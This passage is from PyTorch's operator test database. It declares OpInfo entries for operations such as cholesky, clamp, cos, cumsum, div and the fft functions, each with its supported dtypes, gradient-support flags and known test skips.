supports_sparse_csr=True, assert_autodiffed=True), OpInfo('cholesky', dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_linalg_cholesky, gradcheck_wrapper=gradcheck_wrapper_hermitian_input, decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack],), 
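# For cholesky_inverse below, gradcheck_wrapper_triangular_input_real_positive_diagonal (as its name suggests) keeps perturbed gradcheck samples triangular with a positive real diagonal, the set on which the op stays well defined.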
OpInfo('cholesky_inverse', dtypes=floating_and_complex_types(), backward_dtypes=floating_and_complex_types(), supports_fwgrad_bwgrad=True, supports_forward_ad=True, check_batched_gradgrad=True, sample_inputs_func=sample_inputs_linalg_cholesky_inverse, gradcheck_wrapper=gradcheck_wrapper_triangular_input_real_positive_diagonal, decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack], skips=( # Strides are not the same! Original strides were ((4, 2, 1),) and strides are now ((4, 1, 2),) DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'),)), OpInfo('cholesky_solve', op=torch.cholesky_solve, dtypes=floating_and_complex_types(), sample_inputs_func=sample_inputs_cholesky_solve, check_batched_gradgrad=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_wrapper=lambda *args, **kwargs: gradcheck_wrapper_triangular_input(*args, idx=1, **kwargs), decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack]), OpInfo('chunk', dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16, torch.chalf), sample_inputs_func=sample_inputs_chunk, reference_inputs_func=reference_inputs_chunk, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False), OpInfo('clone', ref=np.copy, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16, torch.chalf), sample_inputs_func=sample_inputs_clone, reference_inputs_func=reference_inputs_clone, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False), OpInfo('contiguous', op=lambda x, *args, **kwargs: x.contiguous(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16, torch.chalf), sample_inputs_func=sample_inputs_contiguous, supports_forward_ad=True, supports_fwgrad_bwgrad=True, autodiff_fusible_nodes=['aten::contiguous'], assert_jit_shape_analysis=True, supports_out=False, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), )), OpInfo('sum_to_size', op=lambda x, *args, **kwargs: x.sum_to_size(*args, **kwargs), dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), sample_inputs_func=sample_inputs_sum_to_size, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, skips=( # lambda impl DecorateInfo(unittest.expectedFailure, "TestNormalizeOperators", "test_normalize_operator_exhaustive"), DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit', dtypes=(torch.float,)),),), OpInfo('symeig', dtypes=floating_and_complex_types(), check_batched_grad=False, check_batched_gradgrad=False, sample_inputs_func=sample_inputs_symeig, gradcheck_wrapper=gradcheck_wrapper_hermitian_input, skips=( DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_backward'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_variant_consistency_eager', device_type='mps', dtypes=[torch.float32]), DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', device_type='mps', dtypes=[torch.float32]), ), decorators=[skipCUDAIfNoMagma, skipCPUIfNoLapack, with_tf32_off]), # NOTE: clamp has separate opinfos for scalar min/max (unary op) vs. 
tensors OpInfo('clamp', aliases=('clip',), ref=_clamp_numpy, dtypes=all_types_and(torch.bfloat16), dtypesIfCUDA=all_types_and(torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_clamp, reference_inputs_func=partial(reference_inputs_elementwise_ternary, sample_inputs_func=sample_inputs_clamp), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # nvFuser and NNC appear to not handle boolean clamp DecorateInfo(unittest.expectedFailure, 'TestCudaFuserOpInfo', 'test_nvfuser_correctness', dtypes=(torch.bool,)), DecorateInfo(unittest.expectedFailure, 'TestNNCOpInfo', 'test_nnc_correctness', dtypes=(torch.bool,)), )), UnaryUfuncInfo('positive', ref=np.positive, dtypes=all_types_and_complex_and(torch.half, torch.bfloat16, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, ), UnaryUfuncInfo('conj', ref=np.conj, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half, torch.chalf), supports_sparse=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False), UnaryUfuncInfo('conj_physical', ref=np.conj, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.half, torch.chalf), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_sparse=True, supports_sparse_csr=True, skips=( # RuntimeError: inputSet && outputSet # INTERNAL ASSERT FAILED at "../torch/csrc/jit/passes/utils/check_alias_annotation.cpp":118, # please report a bug to PyTorch. DecorateInfo(unittest.skip("Skipped!"), 'TestJit', 'test_variant_consistency_jit', dtypes=(torch.float32, )), DecorateInfo(unittest.skip("Skipped! conj_physical_ not implemented for sparse"), 'TestSparseUnaryUfuncs', 'test_inplace'), # RuntimeError: "nonzero_count_cpu" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, "TestSparseCSR", "test_sparse_csr_consistency", dtypes=(torch.complex32,)), # RuntimeError: "nonzero_count_cpu" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, "TestSparseCSR", "test_sparse_csr_unary_inplace", dtypes=(torch.complex32,)), # RuntimeError: "nonzero_count_cpu" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, "TestSparseCSR", "test_sparse_csr_unary_out", dtypes=(torch.complex32,)), # RuntimeError: "add_out_op2_sparse_csr" not implemented for 'ComplexHalf' DecorateInfo(unittest.expectedFailure, "TestSparseCSR", "test_zero_to_zero_correspondence_unary", dtypes=(torch.complex32,)), )), OpInfo('resolve_conj', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_view_as_real, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, ), OpInfo('resolve_neg', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), sample_inputs_func=sample_inputs_view_as_real, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False, ), OpInfo('view_as_real', dtypes=complex_types(), supports_forward_ad=True, supports_out=False, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_view_as_real, test_conjugated_samples=False, ), OpInfo('view_as_complex', dtypes=floating_types_and(torch.half), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, test_neg_view=False, sample_inputs_func=sample_inputs_view_as_complex, skips=( # RuntimeError: Tensor must have a last dimension with stride 1 DecorateInfo(unittest.expectedFailure, "TestCommon", "test_noncontiguous_samples"), # RuntimeError: "eq_cpu" not implemented for 
'ComplexHalf' DecorateInfo(unittest.skip("Skipped!"), 'TestNNCOpInfo', 'test_nnc_correctness', dtypes=(torch.half,)), # RuntimeError: "eq_cpu" not implemented for 'ComplexHalf' DecorateInfo(unittest.skip("Skipped!"), 'TestCudaFuserOpInfo', 'test_nvfuser_correctness', dtypes=(torch.half,)), )), BinaryUfuncInfo('complex', dtypes=floating_types_and(torch.half), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_rhs_python_scalar=False, skips=( # Test doesn't account for complex's type promotion semantics DecorateInfo(unittest.expectedFailure, 'TestBinaryUfuncs', 'test_type_promotion'), DecorateInfo(unittest.skip("Skipped!"), 'TestCommon', 'test_out', device_type='mps'), )), BinaryUfuncInfo('copysign', dtypes=all_types_and(torch.bool, torch.half, torch.bfloat16), promotes_int_to_float=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True), OpInfo('corrcoef', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.half, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), sample_inputs_func=sample_inputs_corrcoef, supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_out=False), UnaryUfuncInfo('cos', ref=np.cos, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), assert_autodiffed=True, handles_large_floats=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=(precisionOverride({torch.bfloat16: 1e-2}),), skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=(torch.cfloat, torch.cdouble,), device_type='cpu', active_if=IS_WINDOWS), # This fails on CUDA but passes on ROCm DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=(torch.cdouble,), device_type='cuda'), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', dtypes=[torch.cfloat, torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble], active_if=IS_MACOS), )), UnaryUfuncInfo('cosh', ref=np_unary_ufunc_integer_promotion_wrapper(np.cosh), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # Reference: https://github.com/pytorch/pytorch/issues/48641 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.int8]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=[torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', dtypes=[torch.cfloat, torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=[torch.cfloat, torch.cdouble], active_if=IS_WINDOWS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble], active_if=IS_MACOS), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble], active_if=IS_MACOS), )), OpInfo('cov', dtypes=all_types_and_complex_and(torch.bfloat16), 
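# As elsewhere in this file, bfloat16 coverage on CUDA is gated on CUDA 11+ (or ROCm); see the CUDA11OrLater condition in dtypesIfCUDA just below.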
dtypesIfCUDA=all_types_and_complex_and(torch.half, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), backward_dtypesIfCUDA=all_types_and_complex_and(torch.half, *[torch.bfloat16] if (CUDA11OrLater or TEST_WITH_ROCM) else []), sample_inputs_func=sample_inputs_cov, error_inputs_func=error_inputs_cov, supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # Float did not match double DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_grad'), # Jacobian mismatch DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_fn_gradgrad'), DecorateInfo(unittest.expectedFailure, 'TestGradients', 'test_forward_mode_AD'), DecorateInfo(unittest.skip("Barely fails"), 'TestGradients', 'test_fn_fwgrad_bwgrad'), # JIT test not working for tensor kwargs (https://github.com/pytorch/pytorch/issues/58507) # RuntimeError: # undefined value tensor: # File "<string>", line 3 # def the_method(i0): # return torch.cov(i0, correction=0, fweights=None, aweights=tensor([0.0518, 0.4681], dtype=torch.float32, requires_grad=True)) # noqa: B950 # ~~~~~~ <--- HERE DecorateInfo(unittest.expectedFailure, 'TestJit', 'test_variant_consistency_jit'), DecorateInfo(unittest.skip('Skipped!'), 'TestCudaFuserOpInfo', 'test_nvfuser_extremal_values'), )), OpInfo('cross', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.half), sample_inputs_func=sample_inputs_cross, supports_fwgrad_bwgrad=True, supports_out=True, supports_forward_ad=True), OpInfo('linalg.cross', ref=lambda x, y, dim=-1: np.cross(x, y, axis=dim), op=torch.linalg.cross, dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.half), aten_name='linalg_cross', sample_inputs_func=sample_inputs_cross, supports_out=True, supports_fwgrad_bwgrad=True, supports_forward_ad=True), OpInfo('cumsum', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # cumsum does not handle correctly out= dtypes DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), ), sample_inputs_func=sample_inputs_cumulative_ops), OpInfo('cumprod', dtypes=all_types_and_complex_and(torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.float16, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # cumprod does not handle correctly out= dtypes DecorateInfo(unittest.expectedFailure, 'TestCommon', 'test_out'), DecorateInfo(unittest.expectedFailure, 'TestCompositeCompliance', 'test_backward'), ), # gradgradcheck fails in fast_mode=True: #56275 sample_inputs_func=sample_inputs_cumprod, gradcheck_fast_mode=False), OpInfo('cummax', dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half, torch.bfloat16), sample_inputs_func=partial(sample_inputs_cumulative_ops, supports_dtype_kwargs=False), supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL), OpInfo('cummin', dtypes=all_types_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.bool, torch.half, torch.bfloat16), sample_inputs_func=partial(sample_inputs_cumulative_ops, supports_dtype_kwargs=False), supports_forward_ad=True, supports_fwgrad_bwgrad=True, gradcheck_nondet_tol=GRADCHECK_NONDET_TOL), UnaryUfuncInfo('deg2rad', ref=np.radians, decorators=(precisionOverride({torch.bfloat16: 7e-1, torch.float16: 7e-1}),), dtypes=all_types_and(torch.bool, torch.half, 
torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( # Reference: https://github.com/pytorch/pytorch/pull/51283#issuecomment-770614273 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=[torch.bfloat16]), )), OpInfo('diff', op=torch.diff, # np.diff has np._NoValue as default values for prepend and append, compare_with_reference breaks if prepend/append # are set as None when converting to numpy ref=lambda input, n=1, dim=-1, prepend=np._NoValue, append=np._NoValue: ( np.diff(input, n, dim, np._NoValue if prepend is None else prepend, np._NoValue if append is None else append) ), dtypes=all_types_and_complex_and(torch.bool, torch.float16, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_diff), BinaryUfuncInfo('div', aliases=('divide',), variant_test_name='no_rounding_mode', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_forward_ad=True, promotes_int_to_float=True, supports_fwgrad_bwgrad=True, supports_two_python_scalars=True, assert_autodiffed=True, rhs_make_tensor_kwargs=dict(exclude_zero=True),), BinaryUfuncInfo('div', aliases=('divide',), variant_test_name='trunc_rounding', dtypes=all_types_and(torch.half, torch.bfloat16), sample_inputs_func=partial(sample_inputs_elementwise_binary, sample_kwargs=dict(rounding_mode="trunc")), supports_forward_ad=True, promotes_int_to_float=True, supports_fwgrad_bwgrad=True, supports_two_python_scalars=True, assert_autodiffed=True, rhs_make_tensor_kwargs=dict(exclude_zero=True), skips=( # RuntimeError: MALFORMED INPUT: Unhandled node kind (in computeValue): aten::div DecorateInfo(unittest.expectedFailure, 'TestNNCOpInfo', 'test_working'), )), BinaryUfuncInfo('div', aliases=('divide',), variant_test_name='floor_rounding', dtypes=all_types_and(torch.half, torch.bfloat16), sample_inputs_func=partial(sample_inputs_elementwise_binary, sample_kwargs=dict(rounding_mode="floor")), supports_forward_ad=True, promotes_int_to_float=True, supports_fwgrad_bwgrad=True, supports_two_python_scalars=True, assert_autodiffed=True, rhs_make_tensor_kwargs=dict(exclude_zero=True), skips=( # RuntimeError: MALFORMED INPUT: Unhandled node kind (in computeValue): aten::div DecorateInfo(unittest.expectedFailure, 'TestNNCOpInfo', 'test_working'), )), BinaryUfuncInfo('true_divide', dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), supports_forward_ad=True, promotes_int_to_float=True, supports_fwgrad_bwgrad=True, supports_two_python_scalars=True, rhs_make_tensor_kwargs=dict(exclude_zero=True)), UnaryUfuncInfo('exp', ref=np_unary_ufunc_integer_promotion_wrapper(np.exp), dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16, torch.chalf), skips=( # Reference: https://github.com/pytorch/pytorch/pull/50093#pullrequestreview-561791547 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', dtypes=[torch.bfloat16]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', dtypes=[torch.bfloat16, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_small', dtypes=[torch.bfloat16]), # Reference: 
https://github.com/pytorch/pytorch/issues/48010 DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_large', device_type='cpu', dtypes=[torch.cfloat, torch.cdouble]), ), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True), OpInfo('expand', op=lambda self, shape: self.expand(shape), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), sample_inputs_func=sample_inputs_expand, supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_jit_shape_analysis=True, supports_out=False, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'), )), OpInfo('expand_as', op=lambda self, other: self.expand_as(other), dtypes=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_expand_as, supports_out=False, skips=( DecorateInfo(unittest.expectedFailure, 'TestNormalizeOperators', 'test_normalize_operator_exhaustive'),), ), OpInfo('diag', dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16), dtypesIfCUDA=all_types_and_complex_and(torch.bool, torch.half, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_diag, error_inputs_func=error_inputs_diag), OpInfo('diag_embed', dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_diagonal_diag_embed), OpInfo('diagonal', # They are not strictly aliases as they have diverging defaults, but we can see them as aliases for testing purposes # If we add tests that test the function against the alias, make linalg.diagonal into its own OpInfo aliases=('linalg.diagonal',), aten_backward_name='diagonal_backward', dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16, torch.chalf), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_diagonal_diag_embed), OpInfo('diagonal_scatter', dtypes=all_types_and(torch.bool, torch.bfloat16, torch.float16), supports_out=False, supports_forward_ad=True, supports_fwgrad_bwgrad=True, sample_inputs_func=sample_inputs_diagonal_scatter), BinaryUfuncInfo('eq', ref=np.equal, dtypes=all_types_and_complex_and(torch.bool, torch.bfloat16, torch.float16, torch.chalf), always_returns_bool=True, supports_autograd=False, sample_inputs_func=sample_inputs_comparison_ops), BinaryUfuncInfo('fmax', op=torch.fmax, dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_rhs_python_scalar=False, skips=( # RuntimeError: "max_elementwise_cuda" not implemented for 'ComplexFloat' DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_type_promotion'), )), BinaryUfuncInfo('fmin', op=torch.fmin, dtypes=all_types_and(torch.float16, torch.bfloat16, torch.bool), supports_forward_ad=True, supports_fwgrad_bwgrad=True, supports_rhs_python_scalar=False, skips=( # RuntimeError: "min_elementwise_cuda" not implemented for 'ComplexFloat' DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_type_promotion'), )), BinaryUfuncInfo('fmod', ref=np.fmod, dtypes=all_types_and(torch.float16, torch.bfloat16), 
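# fmod follows C fmod semantics (the result takes the sign of the dividend), matching np.fmod; remainder below follows Python's % (sign of the divisor), matching np.remainder. exclude_zero on the rhs avoids zero divisors in generated samples.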
dtypesIfCUDA=all_types_and(torch.float16, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_autodiffed=None, rhs_make_tensor_kwargs={'exclude_zero': True}, decorators=( DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_contig_vs_every_other', dtypes=(torch.bfloat16,)), DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_non_contig', dtypes=(torch.bfloat16,)), DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics', dtypes=(torch.bfloat16,)), DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics_small_values', dtypes=(torch.uint8,)), )), BinaryUfuncInfo('remainder', ref=np.remainder, dtypes=all_types_and(torch.float16, torch.bfloat16), dtypesIfCUDA=all_types_and(torch.float16, torch.bfloat16), supports_forward_ad=True, supports_fwgrad_bwgrad=True, assert_autodiffed=None, operator_variant=operator.mod, inplace_operator_variant=operator.imod, supports_one_python_scalar=True, rhs_make_tensor_kwargs={'exclude_zero': True}, decorators=( DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_contig_vs_every_other', dtypes=(torch.bfloat16,)), DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_non_contig', dtypes=(torch.bfloat16,)), DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics', dtypes=(torch.bfloat16,)), DecorateInfo(unittest.skip("Skipped!"), 'TestBinaryUfuncs', 'test_reference_numerics_small_values', dtypes=(torch.uint8,)), # Fails on XLA # False is not true : Tensors failed to compare as equal! # Attempted to compare equality of tensors with different dtypes DecorateInfo(unittest.skip("Skipped!"), 'TestOpInfo', device_type='xla', dtypes=(torch.long,)), )), UnaryUfuncInfo('frac', ref=lambda x: np.modf(x)[0], dtypes=floating_types_and(torch.bfloat16, torch.float16), dtypesIfCUDA=floating_types_and(torch.float16, torch.bfloat16), assert_autodiffed=True, supports_forward_ad=True, supports_fwgrad_bwgrad=True, skips=( DecorateInfo(unittest.skip("Skipped!"), 'TestUnaryUfuncs', 'test_reference_numerics_extremal', dtypes=(torch.bfloat16, torch.float16, torch.float32, torch.float64)), # 76047 DecorateInfo(unittest.expectedFailure, 'TestNNCOpInfo', 'test_nnc_correctness', dtypes=(torch.float32, torch.float64)), )), SpectralFuncInfo('fft.fft', aten_name='fft_fft', ref=np.fft.fft, ndimensional=SpectralFuncType.OneD, dtypes=all_types_and_complex_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and_complex_and( torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half, torch.complex32)), supports_forward_ad=True, supports_fwgrad_bwgrad=True, ), SpectralFuncInfo('fft.fft2', aten_name='fft_fft2', ref=np.fft.fft2, ndimensional=SpectralFuncType.TwoD, dtypes=all_types_and_complex_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and_complex_and( torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half, torch.complex32)), supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=[precisionOverride( {torch.float: 1e-4, torch.cfloat: 1e-4})], ), SpectralFuncInfo('fft.fftn', aten_name='fft_fftn', ref=np.fft.fftn, ndimensional=SpectralFuncType.ND, dtypes=all_types_and_complex_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA 
supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and_complex_and( torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half, torch.complex32)), supports_forward_ad=True, supports_fwgrad_bwgrad=True, decorators=[precisionOverride( {torch.float: 1e-4, torch.cfloat: 1e-4})], ), SpectralFuncInfo('fft.hfft', aten_name='fft_hfft', ref=np.fft.hfft, ndimensional=SpectralFuncType.OneD, dtypes=all_types_and_complex_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and_complex_and( torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half, torch.complex32)), supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_gradgrad=False), SpectralFuncInfo('fft.hfft2', aten_name='fft_hfft2', ref=scipy.fft.hfft2 if has_scipy_fft else None, ndimensional=SpectralFuncType.TwoD, dtypes=all_types_and_complex_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and_complex_and( torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half, torch.complex32)), supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_gradgrad=False, decorators=[ DecorateInfo( precisionOverride({torch.float: 2e-4, torch.cfloat: 2e-4}), 'TestFFT', 'test_reference_nd')], ), SpectralFuncInfo('fft.hfftn', aten_name='fft_hfftn', ref=scipy.fft.hfftn if has_scipy_fft else None, ndimensional=SpectralFuncType.ND, dtypes=all_types_and_complex_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and_complex_and( torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half, torch.complex32)), supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_gradgrad=False, decorators=[ DecorateInfo( precisionOverride({torch.float: 2e-4, torch.cfloat: 2e-4}), 'TestFFT', 'test_reference_nd'), ], ), SpectralFuncInfo('fft.rfft', aten_name='fft_rfft', ref=np.fft.rfft, ndimensional=SpectralFuncType.OneD, dtypes=all_types_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and(torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half,)), supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_grad=False, skips=( ), check_batched_gradgrad=False), SpectralFuncInfo('fft.rfft2', aten_name='fft_rfft2', ref=np.fft.rfft2, ndimensional=SpectralFuncType.TwoD, dtypes=all_types_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and(torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else (torch.half,)), supports_forward_ad=True, supports_fwgrad_bwgrad=True, check_batched_grad=False, check_batched_gradgrad=False, decorators=[ precisionOverride({torch.float: 1e-4}), ],), SpectralFuncInfo('fft.rfftn', aten_name='fft_rfftn', ref=np.fft.rfftn, ndimensional=SpectralFuncType.ND, dtypes=all_types_and(torch.bool), # rocFFT doesn't support Half/Complex Half Precision FFT # CUDA supports Half/ComplexHalf Precision FFT only on SM53 or later archs dtypesIfCUDA=all_types_and(torch.bool, *() if (TEST_WITH_ROCM or not SM53OrLater) else 
